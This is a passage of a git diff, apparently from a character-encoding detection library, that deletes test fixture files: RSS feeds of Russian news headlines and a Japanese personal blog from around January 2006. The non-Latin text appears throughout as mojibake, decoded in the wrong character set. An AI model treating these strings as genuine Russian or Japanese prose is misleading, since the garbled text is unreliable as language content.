עסק המככאנמג - http://www.newsru.com/crime/03jan2006/grab.html - „גמו םוטחגוסעםץ גוקונמל ג ןמםוהוכםטך סמגונרטכט נאחבמיםמו םאןאהוםטו םא ןףםךע מבלוםא גאכ‏ע םא מנמגסךמל רמססו. אססטנא ףהאנטכט ןמ דמכמגו ט סגחאכט. - נטלטםאכ - Tue, 3 Jan 2006 12:03:00 +0300 - - - - - ‚ ‘˜€ ךמע סןאס זטחם ץמחטםף, ןמחגמםטג ןמ עוכופמםף ג סכףזבף 911 - http://www.newsru.com/world/03jan2006/cat.html - 50 כועםטי ƒאננט מרויחמם ףןאכ ס טםגאכטהםמדמ ךנוסכא ט םו למד ןמהםעס טח-חא סכףקטגרודמס לטךנמטםסףכעא. •מחטם זטגמעםמדמ ןנטחםאכס, קעמ סןוצטאכםמ ןעאכס מבףקטע ךמעא םאזטלאע םא עוכופמםו ךםמןךף ןנלמדמ חגמםךא ג סכףזבף 911, םמ םטךאך םו נאססקטעגאכ, קעמ ךמע הויסעגטעוכםמ סלמזוע ‎עמ סהוכאע. - ‚ לטנו - Tue, 3 Jan 2006 11:42:00 +0300 - - - - - - - - - ולוצךא ןאנא חאלףנמגאכא ג בועמם הגףץ הועוי - http://www.newsru.com/crime/03jan2006/germanz.html - ‘ ןנטחםאםטול ג ןנאגממץנאםטעוכםו מנדאם גטכס לףזקטםא. ם סממבשטכ, קעמ ג סונוהטםו 1990-ץ דמהמג מם חאץמנמםטכ הגףץ הועוי ג ןמהגאכו המלא. ’וכא הועוי בכט סןנעאם ג לףסמנםי ןאךוע ט חאלףנמגאם. - נטלטםאכ - Tue, 3 Jan 2006 11:24:00 +0300 - - - - - ˆ„ מבגטםוע ’בטכטסט ג נאסךנףקטגאםטט אםעטנמססטיסךמי ךאלןאםטט - http://www.newsru.com/russia/03jan2006/gruz.html - ’בטכטסט נאסךנףקטגאוע אםעטנמססטיסךף‏ ךאלןאםט‏. ƒמגמנטע מ סנמךאץ ןמהןטסאםט נמססטיסךמ-דנףחטםסךמדמ „מדמגמנא מ הנףזבו למזםמ עמכךמ ןמסכו םמנלאכטחאצטט אעלמספונ ג הגףסעמנמםםטץ מעםמרוםטץ, םאסעאטגאוע ˆ„. - ‚ מססטט - Tue, 3 Jan 2006 11:04:00 +0300 - - - - - - - אסעוע קטסכמ ןמדטברטץ ג נוחףכעאעו מבגאכא ךנרט ךאעךא ג אגאנטט - http://www.newsru.com/world/03jan2006/de.html - מ לונו ןנמהמכזוםט סןאסאעוכםץ נאבמע םא לוסעו מבנףרוםט ךנרט סןמנעךמלןכוךסא ג לוסעוקךו אה איץוםץאכ סןאסאעוכט טחגכוךא‏ע טח-ןמה חאגאכמג גסו םמגו עוכא. מ ןמסכוהםטל האםםל, קטסכמ ןמדטברטץ המסעטדכמ 15 קוכמגוך. מכוו 30 קוכמגוך ןמכףקטכט נאםוםט. —ועגונמ סקטעא‏עס ןנמןאגרטלט בוח גוסעט. - ‚ לטנו - Tue, 3 Jan 2006 10:52:00 +0300 - - - - - - - - - - - - - - - - - - - - „גמו גמוםםמסכףזאשטץ ןמדטבכט םא ג —וקםו - http://www.newsru.com/russia/03jan2006/chechen.html - מהגונדס מבסענוכף םא מךנאטםו נאיצוםענא ףנקאכמי. וטחגוסעםו כטצא טח אגעמלאעטקוסךמדמ מנףזט מבסענוככט םאנה גמוםםמסכףזאשטץ ‚םףענוםםטץ גמיסך, מסףשוסעגכגרטי המסלמענ אגעמענאםסןמנעא. - ‚ מססטט - Tue, 3 Jan 2006 10:34:00 +0300 - - - - - ‚חנג םא ראץעו ג ‘˜€: 13 דמנםךמג ןנמןאכט בוח גוסעט - http://www.newsru.com/world/03jan2006/mine.html - ‚חנג ןנמטחמרוכ םא ףדמכםמי ראץעו ג ‡אןאהםמי ‚טנהזטםטט. ‘ןאסאעוכל ןמךא םו ףהאועס ףסעאםמגטע ךמםעאךע ס דמנםךאלט, ךמעמנו ןנוהןמכמזטעוכםמ בכמךטנמגאם םא דכףבטםו ג 80 לוענמג. - ‚ לטנו - Tue, 3 Jan 2006 10:21:00 +0300 - - - - - - - - "ƒאחןנמל": “ךנאטםא ןנמהמכזאוע גמנמגאע, םמ ןמסעאגךאל ‎עמ םו ןמלוראוע - http://www.newsru.com/finance/03jan2006/gas.html - נוחטהוםע “ךנאטם שוםךמ ףעגונזהאוע, קעמ דאחמענאםסןמנעםא סטסעולא סענאם מבוסןוקטגאוע ענאםחטע. "ƒאחןנמל" מבושאוע וגנמןויסךטל ןמענובטעוכל ךמלןוםסאצטט, ףעגונזהא, קעמ “ךנאטםא ןנמהמכזאוע םוסאםךצטמםטנמגאםםמ מעבטנאע נמססטיסךטי דאח. - ךמםמלטךא - Tue, 3 Jan 2006 10:11:00 +0300 - - - - - - - - - ‘ןוצמןונאצט ג „אדוסעאםו: ףבטע 5 במוגטךמג ט 2 לטכטצטמםונא - http://www.newsru.com/russia/03jan2006/oper.html - ‚ ץמהו לאסרעאבםמי סןוצמןונאצטט ןמ בכמךטנמגאםט‏ דנףןן במוגטךמג ג “םצףךףכסךמל נאימםו „אדוסעאםא נאםוםט ןמכףקטכט 7 סמענףהםטךמג ןנאגממץנאםטעוכםץ מנדאםמג, הגמו טח םטץ סךמםקאכטס. מעונט במוגטךמג מצוםטגא‏עס ג ןע ףבטעץ. €ךעטגםא פאחא סןוצמןונאצטט ס םאסעףןכוםטול עולםמע ןנטמסעאםמגכוםא. - ‚ מססטט - Tue, 3 Jan 2006 09:48:00 +0300 - - - - - - - - 2050 דמהף ג לטנו ןמגעס םמגו סגונץהונזאג. מססט ןנמהמכזטע ןמסעוןוםםמ גלטנאע - http://www.newsru.com/world/03jan2006/future.html - טעאי ך 2050 דמהף סעאםוע סאלמי למשםמי ‎ךמםמלטקוסךמי הונזאגמי ןכאםוע, ˆםהט - לטנמגל כטהונמל ןמ קטסכוםםמסעט םאסוכוםט, עמדהא ךאך מססט ס ףלוםרטגרטלס םאסוכוםטול גמיהוע ג הוסעךף ןמ למשט ‎ךמםמלטךט. - ‚ לטנו - Tue, 3 Jan 2006 09:42:00 +0300 - - - - - - - אגמהםוםטו ג ˆםהמםוחטט: קטסכמ ןמדטברטץ ןנוגסטכמ 50 קוכמגוך - http://www.newsru.com/world/03jan2006/flood.html - ˆח-חא ןנמהמכזאגרטץס הגא הם ןמהנה המזהוי ג נאימםו אםעט ןנמטחמרוכ דטדאםעסךטי מןמכחום ט גרכא טח בונודמג נוךא, ג נוחףכעאעו קודמ למשםו ןמעמךט גמה ט דנחט מבנףרטכטס םא םוסךמכךמ בכטחכוזאשטץ הונוגום. - ‚ לטנו - Tue, 3 Jan 2006 09:26:00 +0300 - - - - - - - - ‚ מסךגו גמ געמנםטך בףהוע למנמחםמ - http://www.newsru.com/russia/03jan2006/pogoda.html - ‚ סעמכטצו סעמכבטך עונלמלוענא םו מןףסעטעס םטזו מעלועךט 1-3 דנאהףסא למנמחא, א ןמ מבכאסעט - 1-6 דנאהףסמג. ‚ועונ בףהוע ‏דמ-גמסעמקםל, ףלונוםםל ט םו ןנוגסטע 3-8 לוענמג ג סוךףםהף. - ‚ מססטט - Tue, 3 Jan 2006 09:15:00 +0300 - - - - - diff --git a/chardet/tests/MacCyrillic/susu.ac.ru.xml b/chardet/tests/MacCyrillic/susu.ac.ru.xml deleted file mode 100644 index 74b7f80..0000000 --- a/chardet/tests/MacCyrillic/susu.ac.ru.xml +++ /dev/null @@ -1,24 +0,0 @@ - - - - -ru -press@susu.ac.ru (–וםענ טםפמנלאצטט ט סגחוי ס מבשוסעגוםםמסע‏) -webmaster@urc.ac.ru (עהוכ דכמבאכםץ סועוגץ עוץםמכמדטי) -http://susu.ac.ru/gerb2.gif -זםמ-“נאכסךטי דמסףהאנסעגוםםי ףםטגונסטעוע -http://susu.ac.ru/ -מגמסעט “נƒ“ -http://susu.ac.ru/ru/news/ -מגמסעט זםמ-“נאכסךמדמ דמסףהאנסעגוםםמדמ ףםטגונסטעועא (—וכבטםסך) -~220 V, 50 Hz -1995-2004 זםמ-“נאכסךטי דמסףהאנסעגוםםי ףםטגונסטעוע -Thu, 10 Mar 2005 15:45:45 +0500 - -Thu, 29 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1329 -אדנאזהום ןמבוהטעוכט ךמםךףנסא סאיעמג -29 הוךאבנ ג חאכו חאסוהאםטי “קםמדמ סמגועא זםמ-“נאכסךמדמ דמסףהאנסעגוםםמדמ סמגועא סמסעמכאס צונולמםט םאדנאזהוםט ןמבוהטעוכוי ךמםךףנסא סאיעמג \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/10e.org.xml b/chardet/tests/SHIFT_JIS/10e.org.xml deleted file mode 100644 index 2a04720..0000000 --- a/chardet/tests/SHIFT_JIS/10e.org.xml +++ /dev/null @@ -1,676 +0,0 @@ - - - - - -ƒGƒ‹ƒGƒ‹ -http://10e.org/ - -ja - -2006-01-03T04:02:09+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -‚¢‚כ‚¢‚כ‚¿‚ו‚ֱ‚ֶ‘ׂ‚ֱ‚ִƒlB -http://10e.org/mt/archives/200601/030402.php -62705 B
    -ƒNƒƒbƒN‚·‚י‚ֶ‚ֵ‚ֱ‚©‚­‚ָ‚ט‚‚·

    - -

    ƒG[ƒbƒNƒXI

    - -

    ‚ [A‚ ‚ֶ¡”N‚אc‚·‚ֶ‚±‚כ‚½‚ֱ‚½‚ּ‚R‚U‚Q“ת‚­‚ח‚¢‚ֹ‚ָ‚ֱ‚ִ‚µ‚‚¢‚‚µ‚½B
    -–¼c‚¨‚µ‚«¡”N‚א‚א‚₪‚·‚®I‚ם‚ט‚ֵ‚·ƒlB

    - -

    ‚»‚ס‚ָƒƒP‚ֵA¡“ת‚ֽ‚¿‚ו‚ֱ‚ֶ‹}‚¬‚ֵ”י–§‚ּƒRƒg‚נ‚µ‚ִ‚½‚ּ‚ֵ‚¿‚ו‚ֱ‚ֶXV‘ׂ‚ֱ‚ִƒlB
    -‚¢‚כ‚¢‚כ‚ֶ‰B‚ך‚ִƒRƒ\ƒRƒ\‚ֶ‚ג‚ֱ‚ִ‚י‚ס‚ז[B®¬‚·‚י‚‚ֵ‚[”י–§ƒTB

    - -

    ‚א‚₪ƒGƒ‹ƒGƒ‹‚ֽ‘S‚­‚¨³‹C•ָׂ‚ס‚ִ‚ָ‚¢‚ּ‚ֵ‚·‚×A¡“ת–י‚ּ‚V ‚ֹ‚¢‚ֲ‚א‚ֽ‚W‚‚ֵ‚ג‚ֱ‚ִ‚י“X‚ֹs‚ֱ‚½‚ח‚ַ‚₪‚ג‚ח‰c‹ֶ‚ֽ‚¨³‚ֽ‚U‚‚ֵ‚¾‚ֱ‚½‚ח‚µ‚­•ֲ‚‚ֱ‚ִ‚½Bƒ`ƒ‡[ƒuƒ‹[‚ֹ‚ָ‚ט‚‚µ‚½B‚¨³‰¿i‚ּƒqƒQƒ\ƒ”ƒ‚¢‚ֹ‚¢‚ֱ‚½‚ּ‚ֹEEEB
    -‚ ‚ֶA”L—p‚ּ’ּuƒlƒRƒ^ƒ[v‚נ”ƒ‚¨‚₪‚©‚ַ‚₪‚©”Y‚ס‚ֵ‚יƒƒP‚ֵ‚·‚×A‰‚½‚µ‚ִƒEƒ`‚ּƒlƒR‚¿‚ב‚ס‚ֹ”ƒ‚ֱ‚ִ‚ ‚°‚י‚ֶל‚ס‚ֵד‚י‚¾‚כ‚₪‚©EEE‚ֱ‚ִ‚ּ‚×”סם‚ֹ”Y‚‚ַ‚±‚כBq”L‚¿‚ב‚ס‚ֶ‚©‚ֽ—V‚װ‚ּ‘וD‚«‚¾‚©‚חד‚י‚ח‚µ‚¢‚ס‚ֵ‚·‚¯‚ַƒlBƒEƒ`‚ּƒlƒR‚¿‚ב‚ס‚ֽ‚ֶ‚ֹ‚©‚­ƒpƒ\ƒRƒ“‚ּƒ‚ƒjƒ^[‚ּד‚ֶ•z’c‚ּד‚בוD‚«‚ָ‚ס‚¾‚ז‚ָ‚`B

    - -

    –¾“ת‚‚½”ƒ‚¢‚ֹs‚±‚₪EEEB

    - -

    ‚¨³’†‚ֽ‚¿‚ו‚ֱ‚ֶ‚‚ֱ‚½‚טXV‚ֵ‚µ‚ד‚¢‚‚¹‚סƒlB
    -‰e‚ֵƒRƒ\ƒRƒ\‚ֶ‚ ‚ס‚ָƒRƒg‚ג‚±‚ס‚ָƒRƒg‚נ‚µ‚ִ‚י‚ס‚ֵ‚¿‚ו‚ֱ‚ֶ‘ׂ‚ֱ‚ִƒlB

    - -

    ‚¨‚‚¯
    -ƒCƒMƒƒXAƒCƒ‰ƒNם‚ּ]RMֽ‚׃lƒbƒg‹£”„‚ײ
    -ƒxƒgƒiƒ€ם‘ˆ‚ִּ—ˆ‚©H

    ]]>
    -¬¾“ת‹L -elel -2006-01-03T04:02:09+09:00 -
    - -”Nnis’†‚ֵ‚·B -http://10e.org/mt/archives/200601/020248.php -357100 B
    -ƒNƒƒbƒN‚·‚י‚ֶ‚ֵ‚ֱ‚©‚­‚ָ‚ט‚‚·

    - -

    ¡”N‚ּ–•WB
    -‚±‚ּ^‚ֽƒ}ƒW‚ּ^‚ָ‚ּ‚©H‚»‚ך‚ֶ‚א‡¬‚ָ‚ּ‚©H‚ֱ‚ִ‚ּ‚נ©‹ֹ‚‚יƒRƒgBi^‚×–³‘‚ֹƒfƒJƒC‚ּ‚ֽƒGƒ‹ƒGƒ‹‚ּˆ₪מ‚ֵ‚·j

    - -

    ƒGƒ‹ƒGƒ‹“I‚ֹ‚ֽu‡¬v‚¾‚ֶv‚₪‚ּ‚ֵ‚·‚×AƒGƒ“ƒWƒ“‚ֹ•תֻ”M‚‚ֵ‚ ‚יƒgƒRƒ‚ֽ‡¬El‚ּƒCƒW‚ּ‹ZH
    -‚»‚ך‚ֶ‚א‚ג‚ֱ‚ֿ‚טƒzƒ“ƒg‚ֹ”ע‚ס‚ֵ‚יֵ’†‚ּ^‚©‚ָH‚³‚ֱ‚«‚©‚ח–­‚ֹ‚»‚ּ•”•ׂ׋C‚ֹ‚ָ‚ֱ‚ִ‚µ‚©‚½‚ָ‚¢‚P‚O־‚ֵ‚·B
    -‹@‘ּ‰÷‘₪‚ֹˆךƒJu‡‚¯‚ִ‚י‚ז‚₪‚ָ•”•×v‚ׂ ‚יƒgƒRƒ‚נ©‚י‚ֶA‚ג‚ֱ‚ֿ‚ט‡¬‚©EEEBְ•¨‚¾‚ֱ‚½‚ח‚¿‚ו‚ֱ‚ֶl‚¦‚ח‚ך‚ָ‚¢‚µB^‰ֶ‚ּ״‚ט”²‚«ƒ~ƒX‚ֱ‚½Hu’ov‚ֱ‚ִ‘fl‚ֹ‚ֽנ‚µ‚¢‚זƒli‚ ‚ס‚‚טg‚¦‚ָ‚¢‚¯‚ַjB

    - -

    ‚ֱ‚ֶAƒƒP‚ּ‚ם‚©‚ח‚ָ‚¢˜b‚־‚©‚ט‚ֵ‚µ‚ד‚‚‚¹‚סB

    - -

    ‚¿‚ָ‚‚ֹ‚±‚ּ”עs‹@‚ֽ‚r‚q‚V‚P‚ֶ‚©‚ֱ‚ִ¾‚¢‚ֲ‚ֲA’ּ‚ֽuƒuƒ‰ƒbƒNƒo[ƒhv‚ֶ‚©‚ֱ‚ִ¾‚ם‚ך‚ִ‚י‚ח‚µ‚¢—גםת‚ֹל‚ח‚ך‚½’´‚‚“x‚ּ’´‰¹‘¬’ד@‹@Bƒ}ƒbƒn‚R‚­‚ח‚¢‚ֵ‚©‚ֱ”ע‚װ‚ח‚µ‚¢Bּ‚ֽƒzƒ“ƒg‚ְֹם‚ֵg‚ם‚ך‚½‚»‚₪‚ֵ‚·‚×A¡‚ֽ‚א‚₪g‚ם‚ך‚ִ‚ָ‚¢‚ֱ‚µ‚וB‰q¯‚ׂ ‚י‚ּ‚ֵ•K—vƒiƒbƒVƒ“ƒO‚ֹ‚ָ‚ֱ‚½—\´B^‚ֽ“סlז‚ט‚¾‚¯‚ַAˆךlז‚ט‚ּ‚א‚ ‚י‚‚½‚¢‚זB

    - -

    ‚ֱ‚ֶA¡“ת‚א³‹C‚ֹ‘S‘RײW‚ָ‚¢ƒRƒg‚־‚©‚ט‘‚¢‚ִ‚¢‚יƒƒP‚ֵ‚·‚×A–{“ת‚ֽ‚¿‚ו‚ֱ‚ֶXV‚ֽ‚¨‹x‚‚ֶ¾‚₪‚©A‚¿‚ו‚ֱ‚ֶˆב‚₪ƒRƒg‚µ‚ִ‚י‚ס‚ֵ‚µ‚ד‚‚‚¹‚סB
    -‚‚חA‚א‚₪”N––‚©‚ח‰„X‚ֶƒGƒ‹ƒGƒ‹‚ֽ’…‘ײ‚¦‚ִ‚ָ‚¢ƒƒP‚ֵ‚·‚µAuƒGƒ‹ƒGƒ‹¦‚­‚ָ‚¢‚ּHv‚ֱ‚ֶ‚©‚½‚‚ ‚ֹ¾‚ם‚ך‚י‚ס‚ֵ‚·‚×A‚»‚כ‚»‚כ“€€‚µ‚ז‚₪‚ֹ¦‚¢ƒƒP‚¾‚µB‚[’…‘ײ‚¦‚½ƒgƒRƒ‚ֵ¡‚ז‚ט‚את’…‚ֹ‚ָ‚י‚ֱ‚ִ¾‚₪•״‚ֽ‘S‚­‚ָ‚¢‚ס‚ֵ‚·‚¯‚ַƒlB
    -’†‚ּl‚ֽ“~•‚׋ךט‚ח‚µ‚¢B‚ ‚ּ—m•‚ּƒVƒ‚ׂ‚©‚ֲ‚­EEEE‚ֱ‚ִ‚³‚ֱ‚«¾‚ֱ‚ִ‚‚µ‚½B

    - -

    ƒAƒ“ƒP[ƒg‚ֽI—¹I‚ֱ‚ִ¾‚ֱ‚½‚ּ‚ֹAְ‚ֽ”ק–­‚ֹ“•[‚נ‚µ‘±‚¯‚ִ‚¢‚יl‚ׂ¢‚י‚±‚ֶ‚א—c—‚ֽ‚ֶ‚ִ‚א’m‚ֱ‚ִ‚¢‚יEEEB¡”N‚ֽ•’‚ָXV‚¾‚¯‚¶‚ב‚ָ‚­‚ִA‚ֶ‚ט‚ ‚¦‚¸‚¢‚כ‚ס‚ָƒRƒg‚נ‚µ‚½‚¢‚ָ‚`‚ֱ‚ֶ‚©A–O‚«‚ֱ‚‚¢“ת–{l‚×¾‚ֱ‚ִ‚¨‚ט‚‚·BƒGƒ‹ƒGƒ‹‚ֽ“ת–{l‚¾‚¯‚ַA’n‹…l‚©‚ַ‚₪‚©‚ֽ”י–§‚ֵ‚·‚×EEEB

    - -


    -g”’‚ּ‹ױ‰¢B‚ּuƒuƒ‹ƒKƒƒAIv
    -‚ַ‚ס‚ַ‚ס–”’‚»‚₪‚¾‚©‚ח‚ג‚ךEEE‚ֱ‚ִ´‚¶B[‚¢ˆ׃–¡‚ֽ‚ָ‚¢‚ס‚ֵ‚·‚¯‚ַƒl‚—
    -‚m‚g‚j‚ֽי‹ֶ‚ֵּ—L–¼‚ֶ‚©‚נ‚µ‚ב‚׳‚יƒRƒg‚ֽ‹ײ~‚³‚ך‚ִ‚י‚©‚חƒlBR•Sb‚×u^‚ֱװ‚ָƒ|ƒ‹ƒVƒF`פv‚נu^‚ֱװ‚ָƒNƒ‹ƒ}`פv‚ֶ‚©‚ֱ‚ִ‰ּ‚ֱ‚½‚ּ‚ֽ—L–¼‚ָ˜b‚ֵ‚·ƒlB‹”N‚¾‚©‚ָ‚ס‚¾‚©Am‚©aiko‚×uƒeƒgƒ‰ƒ|ƒbƒgv‚ֶ‰ּ‚ֱ‚½‚ז‚₪‚ָ‹C‚א‚·‚י‚ּ‚ֵ‚·‚×A‚ ‚ך‚אְ‚ֽ₪•i–¼‚ָ‚ס‚¾‚ֶ‚©B

    - -

    ‚¿‚ָ‚‚ֹƒX[ƒp[‚ֵ”„‚ֱ‚ִ‚יuƒuƒ‹ƒKƒƒAƒˆ[ƒOƒ‹ƒgvB
    -‚ ‚ך‚ֽƒuƒ‹ƒKƒƒA‚׃ˆ[ƒOƒ‹ƒg‚×·‚ס‚ָ‚ּ‚ֵƒl[ƒ~ƒ“ƒO‚ֹg—p‚µ‚½‚¾‚¯‚ֵ‚ָ‚­‚ִAƒzƒ“ƒg‚ֹ’טת“I‚ֹƒuƒ‹ƒKƒƒA‚©‚חuƒ^ƒl‹v‚ֶ‚ָ‚יƒˆ[ƒOƒ‹ƒg‹‚׋ף—A‚³‚ך‚ִ‚»‚ך‚×”|—{‚³‚ך‚ִ‘S‘‚ּH‘ל‚ֹ“ֽ‚­‚»‚₪‚ֵ‚·ƒlB
    -‚ָ‚ּ‚ֵuƒuƒ‹ƒKƒƒAƒˆ[ƒOƒ‹ƒgv‚ֱ‚ִ–¼ז‚ֱ‚ִ‚¢‚¢‚ּ‚ֽ‚ ‚ּƒˆ[ƒOƒ‹ƒg‚¾‚¯‚ח‚µ‚¢B

    - -

    ‚¿‚ָ‚‚ֹAƒˆ[ƒOƒ‹ƒg‚נ”ƒ‚ֱ‚ִ‚«‚ִ‚»‚ך‚נƒXƒv[ƒ“‚ֹ‚·‚­‚ֱ‚ִAˆך‚³‚¶‚¾‚¯‹“‚ּ’†‚ֹ“‚ך‚ִם‰·‚ֵ•ת‚ֱ‚ִ‚¨‚­‚ֶָ’P‚ֹƒˆ[ƒOƒ‹ƒg‚ֱ‚ִo—ˆ‚½‚טEEEB‚½‚¾‚µAם‰·‚ֵ‚¨‚¢‚ֶ‚©‚ָ‚¢‚ֶ‹‚×”ֹB‚µ‚ָ‚¢‚ּ‚ֵAמ–{“I‚ֹ‹“‚ו…‚י‚ּ‚ֶ†ˆךd‚ָ‚ּ‚ֵ—E‹C‚ּ‚ ‚י•‚¾‚¯‚ַ‚₪‚¼B
    -ƒGƒ‹ƒGƒ‹‚ֽ‹ע‚ם‚סB

    - -

    ‚ָ‚ס‚ֶ‚ָ‚­A‚‚ֱ‚½‚ט‚ֶ”Nn“I‚ָis’†‚ֵ‚·EEEB

    ]]>
    -¬¾“ת‹L -elel -2006-01-02T02:48:46+09:00 -
    - -V”N–¾‚¯‚¿‚ב‚ֱ‚½ -http://10e.org/mt/archives/200601/010000.php -21754 B

    - -

    V”N–¾‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪‚²‚´‚¢‚‚·ƒjƒƒB
    -¡”N‚ֽƒlƒR”NAƒlƒRƒ~ƒ~‰F’ˆl‚ֶ‚ּ‘˜‹צ‚נ–²©‚ִ¡”N‚אˆך”N‚ׂס‚־‚כ‚₪‚ֶ‚¨‚א‚ֱ‚½‚¯‚ַA³’U‚ֹ‚t‚e‚n‚ֹ˜A‚ך‚ִs‚©‚ך‚½‚¢‚ָEEE‚ֱ‚ֶ¡“ת‚א–²©‚י—c—‚ֵ¡”N‚אְ‚«‚½‚¢‚ֶv‚¢‚‚·B

    - -

    g”’‚ֽ‚©‚ָ‚ט”ק–­‚¾‚ֱ‚½EEEBֵד‚ּ‚r‚l‚`‚o‚ׂ©‚ֱ‚¿‚ו‚ז‚©‚ֱ‚½‚­‚ח‚¢‚©‚ָB‚ ‚ך‚¶‚ב[”’‘g‚ֲׂ‚ֹˆ‚‚ֱ‚ִ‚י‚זƒlB‚u‚rƒ{ƒr[‚ֽ©‚ִ‚ָ‚¢‚ס‚ֵ‚·‚×EEEB
    -ƒOƒ‰ƒnƒ€ƒnƒ“ƒRƒbƒN‚³‚ס‚נ©‚ִ‚¨‚ט‚‚µ‚½Bƒtƒ@ƒeƒBƒ}‚ּ‘ז‚R‚ּ—\¾‚ֵ¢E‚ֽ–ֵ–S‚·‚י‚ז‚₪‚ֵ‚·B”B‘ע‚³‚ס‚ֽ‘•ֿ‚ם‚ח‚¸ƒXƒeƒL‚ֵ‚µ‚½B

    - -

    ‚ֶ‚ט‚ ‚¦‚¸V”N‚ּ‚²ˆ¥A‚ֵ‚µ‚½B

    - -

    ˜b•ֿ‚ם‚ֱ‚ִB

    - -

    247154 BƒNƒƒbƒN‚·‚י‚ֶ‚ֵ‚ֱ‚©‚­‚ָ‚ט‚‚·
    -V”N‘X‚ֱ‚ִ¾‚₪‚©”N––‚¾‚¯‚ַ‚—AƒZƒNƒV[—‡ƒGƒvƒƒ“‚נ”ג˜I‚µ‚ִ‚­‚ך‚ִ‚¢‚יƒo[ƒ`ƒƒƒ‹ƒKƒ`ƒ“ƒRƒ}ƒXƒNƒ}ƒ“u‰´|‚Pv‚³‚ס‚×y‹ָƒAƒƒ“ƒW‚נ‚µ‚ִ‚יuƒ}ƒƒA—l‚ׂ‚ִ‚י`JAZZ`v‚דֽ‚¢‚½B
    -EEEEEEB
    -ƒ{ƒ“ƒoƒCƒG‚ֽ’N‚ּ÷EEEEHI

    - -

    ‚ֶ‚ט‚ ‚¦‚¸ƒNƒ}‚¿‚ב‚ס‚ֹ‚½‚¹‚ִ^‚נB‚ֱ‚ִ‚‚½B
    -‚±‚ּƒNƒ}‚³‚ס‚נ©‚ִu‚ ‚ IƒAƒ‚¶‚ב‚סIv‚ֱ‚ִv‚ֱ‚½l‚ֽ‚ָ‚©‚ָ‚©‚ּƒ}ƒjƒA‚זƒl`B‚[—L–¼‚¾‚¯‚ַƒlB
    -‚±‚ּ‚¨l`‚³‚ס‚ֽƒpƒ`ƒ“ƒR‰®‚ּi•i‚ֵז‚ט‚‚µ‚½Bˆ׃’n‚ֵ‚א—~‚µ‚©‚ֱ‚½‚ּ‚ֵƒ€ƒL‚ֹ‚ָ‚ֱ‚ִז‚ט‚‚µ‚½B‚¿‚ָ‚‚ֹ“¯‚¶ƒ„ƒc‚ּ¬‚³‚¢‚ּ‚א‚ֱ‚ִ‚½‚ט‚µ‚‚·B
    -ƒGƒ‹ƒGƒ‹‚ֽ‚‚¾‚‚¾‚P‚O־‚ָ‚ּ‚ֵˆ׃O‚ֶƒJƒƒCƒCן–¡‚ָ‚ּ‚זB

    - -

    V”N‚א–¾‚¯‚½‚±‚ֶ‚ֵ‚·‚µA‚»‚כ‚»‚כ‚¢‚כ‚¢‚כ‚נ‚ג‚ט‚½‚¢‚ֶv‚ֱ‚ִ‚¢‚י‚P‚O־‚ֵ‚·B
    -”N––‚ֽ‚¢‚כ‚¢‚כ–Z‚µ‚©‚ֱ‚½‚ּ‚ֵ‚ֶ‚₪‚ֶ‚₪ƒƒN‚ֹ‚ָ‚ֹ‚אo—ˆ‚ס‚©‚ֱ‚½‚µB‚ֶ‚ט‚ ‚¦‚¸A‚¨³‚ֽ–Z‚µ‚­‚ִ”N––‚ֹ©‚ך‚ָ‚©‚ֱ‚½‚¢‚כ‚ס‚ָ‚e‚k‚`‚r‚gƒCƒxƒ“ƒg‚ּ‚e‚k‚`‚r‚g‚ָ‚ַ‚ָ‚ַ‚נ©‚³‚¹‚ִ‚א‚ח‚¨‚₪[‚ֱ‚ֶv‚ֱ‚ִ‚¢‚י‚P‚O־‚ֵ‚·B
    -³‚ּƒeƒƒr”װ‘g‚ֽƒ}ƒ“ƒlƒ‚ָ‚ּ‚ב½‚­‚ִ³’¼–O‚«‚½B

    ]]>
    -¬¾“ת‹L -elel -2006-01-01T00:00:59+09:00 -
    - -‘וA“ת‚¶‚ב‚ס -http://10e.org/mt/archives/200512/310417.php -32551 B
    -ƒNƒƒbƒN‚·‚י‚ֶ‚ֵ‚ֱ‚©‚­‚ָ‚ט‚‚·

    - -

    ‚d‚sƒLƒƒƒbƒgB—F’B‚ּ‚µ‚י‚µEEEB
    -ƒGƒ‹ƒGƒ‹‚א‚ ‚ֶ‚ֵ‚ג‚ֱ‚ִ‚‚ז[I

    - -

    ‚ָ‚ס‚ֶ‚א”N––”Nnis‚ֵ‘‚­ƒRƒg‚א‚ָ‚¢‚ז‚₪‚ָ‹C‚ׂµ‚ֲ‚ֲA‚[‚»‚ך‚ֵ‚א¡“ת‚ֽ‘וA“תB
    -g”’‰ּ‡ם‚ֽ‚װ‚ֱ‚¿‚ב‚¯‚ַ‚₪‚ֵ‚א‚¢‚¢‚ס‚ֵ‚·‚¯‚ַAƒr[ƒg‚½‚¯‚µ‚ּ’´ם»”װ‘g‚נ˜^‰ז‚µ‚ז‚₪‚ֶv‚ֱ‚ִ‚¢‚י‚P‚O־‚ֵ‚·BƒOƒ‰ƒnƒ€Eƒnƒ“ƒRƒbƒN‚³‚ס‚×o‚י‚ג‚ֲƒlB

    - -

    ³‚ֽ•‚ֹ‚ַ‚₪‚ֵ‚א‚¢‚¢‚גEEEB
    -‚א‚₪‚P‚O־‚ָ‚ּ‚ֵ‚¨”N‹‚א‚ח‚¦‚ָ‚¢‚µA•‘”ƒ‚ֱ‚ִ‚אƒƒN‚ָƒ‚ƒ“‚ֽ“‚ֱ‚ִ‚ָ‚¢‚µB

    - -

    ƒAƒbƒvƒ‹‚ּV»•i‚ּuiMeatv
    -‚¿‚ו‚ֱ‚ֶiMeat‚ֹƒƒ‰ƒ^B
    -‚ֵ‚אAƒ}ƒW‚ֹ” J‚¯‚ִ“ק‚×o‚ִ‚«‚½‚חƒrƒr‚ט‚‚­‚י—\´B

    - -

    ƒ‰ƒCƒuƒhƒA‚×Flickr‚נƒCƒ“ƒpƒCƒ„H
    -m‚©‚ֹ—‚ִ‚יEEEB
    -ƒ‰ƒCƒuƒhƒA‚ּƒ„ƒc‚ֽ‚ ‚ךˆָד^‚נ‘ו‚«‚­•\¦‚³‚¹‚י‚±‚ֶ‚ֽo—ˆ‚ָ‚¢‚ּH‚»‚ך‚ֱ‚ִ‚ֲ‚‚ח‚ָ‚­‚ָ‚¢H
